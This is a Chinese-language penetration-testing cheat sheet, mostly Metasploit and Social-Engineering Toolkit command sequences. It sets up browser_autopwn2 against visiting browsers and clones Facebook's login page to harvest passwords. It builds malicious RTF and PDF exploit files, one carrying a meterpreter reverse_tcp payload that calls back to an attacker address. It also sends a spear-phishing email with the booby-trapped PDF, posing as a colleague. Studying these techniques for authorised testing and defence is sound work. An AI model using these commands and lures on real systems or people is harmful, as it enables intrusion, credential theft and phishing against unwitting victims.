浏览器攻击
browser_autpwn2 (BAP2)
mkdir /test 为接受响应的服务器创建目录
use auxiliary/server/browser_autopwn2
set SRVHOST 192.168.56.1
set URIPATH /test
#假设我们的攻击目标是 PC,并不打算依赖于 Adobe Flash 的授权。我们会排除 Android 和 Flash 的利用。
set EXCLUDE_PATTERN android|adobe_flash
show advanced 查看高级选项的完整列表
set ShowExploitList true
set VERBOSE true
exploit
使目标浏览器访问http://192.168.56.1/test
窃取浏览器登录凭证
root@bt:# service apache2 start
root@bt:# setoolkit
Social-Engineering Attacks --> Website Attack Vectors --> Credential Harvester Attack Method --> Site Cloner IP address for the POST back in Harvester/Tabnabbing: 填写本机IP set:webattack> Enter the url to clone:http://www.facebook.com(要克隆伪造的页面) 此时会在/var/www/中生成3个文件,保存在html文件夹中,此时访问本机ip时,则会出现相同登录页面,若目标登录,会把密码储存在生成的harvester文件中
Office
ms10_087漏洞,执行自定义的exe文件
msf > db_status postgresql selected, no connection
msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml
msf > search office
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/exec
msf exploit(ms10_087_rtf_pfragments_bof) > set cmd calc.exe
msf exploit(ms10_087_rtf_pfragments_bof) > exploit
[+] msf.rtf stored at /root/.msf4/local/msf.rtf
root@kali:~# cd /root/.msf4/local 生成的msf.rtf
/*************************************************************************/
use exploit/windows/fileformat/adobe_utilprintf
(Adobe Reader版本应低于8.1.2)
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit
从PDF中分析和提取payload可以使用 PDF Stream Dumper 工具
恶意PDF分析可以参考:
https://zeltser.com/analyzing-malicious-documents/
https://zeltser.com/peepdf-malicious-pdf-analysis/
MailAttack
set> 1 Social-Engineering Attacks
set> 1 Spear-Phishing Attack Vectors
set:phishing>1 Perform a Mass Email Attack
set:payloads>6 Adobe CoolType SING Table "uniqueName" Overflow
set:payloads>2 Windows Meterpreter Reverse_TCP set:payloads> Port to connect back on [443]: All payloads get sent to the /pentest/exploits/set/src/program_junk/template.pdf directory Do you want to rename the file?
example Enter the new filename: moo.pdf
1. Keep the filename, I don't care.
2. Rename the file, I want to be cool. =
ruby /opt/framework/msf3//msfcli exploit/windows/fileformat/adobe_cooltype_sing PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443 OUTPUTPATH=/root/.msf4/local/template.pdf FILENAME=/pentest/exploits/set/src/program_junk/template.pdf ENCODING=shikata_ga_nai E
然后需要特殊处理。这个漏洞针对的Adobe 阅读器的版本是9.3.4之前。
把template.pdf拷贝到一个安装有Adobe Acrobat Pro 9.5.0的机器上(关闭防病毒软件),打开template.pdf,修改后拷贝回原目录下,覆盖原有的template.pdf
set:phishing>2
set:phishing> New filename:Dvssc_ABC_Project_Statue.pdf
set:phishing>1 E-Mail Attack Single Email Address
set:phishing>2 One-Time Use Email Template
set:phishing> Subject of the email:ABC Project Status
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:
Next line of the body: Hi Wang:
Next line of the body: Please review the ABC project status report. We are behind the schedule. I need your advice.
Next line of the body:
Next line of the body: Best Regard!
Next line of the body: li Ming
Next line of the body: ^Cset:phishing> Send email to:wangdongpeng@dvssc.com set:phishing>2 Use your own server or open relay
set:phishing> From address (ex: moo@example.com):liming@dvssc.com
set:phishing> Username for open-relay [blank]:yourname
Password for open-relay [blank]:
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.com
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:yes
[*] SET has finished delivering the emails
set:phishing> Setup a listener [yes|no]:yes